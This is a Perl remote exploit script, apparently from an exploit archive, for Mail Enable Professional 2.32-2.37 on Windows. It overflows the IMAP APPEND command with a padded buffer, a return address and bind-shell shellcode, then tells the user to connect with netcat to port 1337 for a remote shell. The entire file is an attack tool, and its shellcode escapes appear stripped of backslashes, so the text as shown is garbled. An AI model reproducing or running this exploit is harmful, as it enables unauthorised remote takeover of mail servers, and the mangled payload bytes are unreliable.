Home / os / win95

maildisable-v4.pl.txt

Posted on 06 March 2007

#!/usr/bin/perl # # maildisable-v4.pl # # Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit # by mu-b - Wed Nov 29 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.35 (win32) # Mail Enable Professional v2.37 (win32) # ######## use Getopt::Std; getopts('t:n:u:p:', \%arg); use Socket; # Fixed metasploit win32 bindshell port 1337 my $zshell_win32_bind = "x33xc9x83xe9xb0". "x81xc4xd0xfdxffxff". # add %esp, -560 "xd9xeexd9x74x24xf4x5bx81x73x13x1d". "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96". "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2". "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0". "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41". "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82". "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2". "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39". "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9". "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b". "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a". "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88". "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01". "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20". "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e". "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39". "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44". "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96". "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38". "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9". "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09". "x4ex33xe4x96xcdxccx32x69"; # ff e4 -> jmp %esp my @offsets = ( "x63x37x57x7c", # Win2K Server SP4 KERNEL32.dll "x38x07xd2x77", "xefxbexadxde" # DoS ); &print_header; my $target; my $offset; my $user; my $passwd; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (defined($arg{'u'})) { $user = $arg{'u'} } if (defined($arg{'p'})) { $passwd = $arg{'p'} } if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { &usage; } if (!(defined($offset))) { $offset = 0; } if ($offset > $#offsets) { print("only ".($#offsets+1)." targets known!! "); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 2; my $NOP = 'A'; if (connect_host($target, $imapd_port)) { print("-> * Connected "); send(SOCKET, "1 LOGIN ".$user." ".$passwd." ", 0); sleep($send_delay); print("-> * Sending payload "); $buf = "2 APPEND "()"{". ($NOP x 128). "xefxbexadxde". $offset. "x01xa3x19x03". ($NOP x 8 ). $zshell_win32_bind. "} "; send(SOCKET, $buf, 0); sleep($send_delay); print("-> * Successfully sent payload! "); print("-> * nc ".$target." 1337 for shell... "); } sub print_header { print("MailEnable Pro v2.32-7 remote exploit "); print("by: <mu-b@digit-labs.org> "); } sub usage { print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test -n <num> : return addy offset number -u <username> : username for login -p <password> : usernames password )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die("Error: $! "); $paddr = sockaddr_in($port, $iaddr) || die("Error: $! "); $proto = getprotobyname('tcp') || die("Error: $! "); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); return(1338); }

 

TOP